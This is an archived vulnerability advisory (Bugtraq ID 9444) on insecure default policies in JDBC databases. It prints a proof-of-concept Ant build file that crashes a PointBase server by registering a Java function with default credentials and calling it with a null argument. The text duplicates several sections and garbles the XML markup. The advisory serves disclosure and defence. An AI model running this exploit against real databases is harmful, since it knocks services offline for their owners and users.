Multiple JDBC Database Insecure Default Policy Vulnerabilities
BID:9444
Info
Multiple JDBC Database Insecure Default Policy Vulnerabilities
| Bugtraq ID: | 9444 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 19 2004 12:00AM |
| Updated: | Jan 19 2004 12:00AM |
| Credit: | Discovery is credited to Marc Schoenefeld. |
| Vulnerable: |
Sun JDK (Windows Production Release) 1.4.2 _02 Sun J2EE/RI (Windows) 1.4 |
| Not Vulnerable: | |
Discussion
Multiple JDBC Database Insecure Default Policy Vulnerabilities
It has been reported that multiple JDBC database implementations include insecure default security policies. This could expose vulnerable databases to denial of service attacks. This could also permit remote attackers to execute arbitrary commands on systems hosting vulnerable implementations in some circumstances.
These issues are reportedly similar in nature to BIDs 9230 and 8773.
It has been reported that multiple JDBC database implementations include insecure default security policies. This could expose vulnerable databases to denial of service attacks. This could also permit remote attackers to execute arbitrary commands on systems hosting vulnerable implementations in some circumstances.
These issues are reportedly similar in nature to BIDs 9230 and 8773.
Exploit / POC
Multiple JDBC Database Insecure Default Policy Vulnerabilities
The following proof-of-concept was released:
======================build.xml=======================
.(.!-- pointbase denial-of-service by marc schoenefeld --".).
.(.project default="dos".).
.(.property name="host" value="192.168.0.7"/.).
.(.target name="dos".).
.(.sql
driver="com.pointbase.jdbc.jdbcUniversalDriver"
url="jdbc:pointbase://${host}:9092/sample"
userid="pbpublic"
password="pbpublic"
print="true"
.).
.(.![CDATA[
//DROP FUNCTION CRASH5(VARCHAR(20));
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER STYLE SQL;
SELECT CRASH5(null) from SYSUSERS;
]].).
.(.classpath.).
.(.pathelement location="pbclient.jar"/.).
.(./classpath.).
.(./sql.).
.(./target.).
.(./project.).
======================build.xml=======================
The following proof-of-concept was released:
======================build.xml=======================
.(.!-- pointbase denial-of-service by marc schoenefeld --".).
.(.project default="dos".).
.(.property name="host" value="192.168.0.7"/.).
.(.target name="dos".).
.(.sql
driver="com.pointbase.jdbc.jdbcUniversalDriver"
url="jdbc:pointbase://${host}:9092/sample"
userid="pbpublic"
password="pbpublic"
print="true"
.).
.(.![CDATA[
//DROP FUNCTION CRASH5(VARCHAR(20));
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER STYLE SQL;
SELECT CRASH5(null) from SYSUSERS;
]].).
.(.classpath.).
.(.pathelement location="pbclient.jar"/.).
.(./classpath.).
.(./sql.).
.(./target.).
.(./project.).
======================build.xml=======================
Solution / Fix
Multiple JDBC Database Insecure Default Policy Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Multiple JDBC Database Insecure Default Policy Vulnerabilities
References:
References:
- Proof-Of-Concept Denial-Of-Service Pointbase 4.6 Java SQL-DB (Marc Schoenefeld
)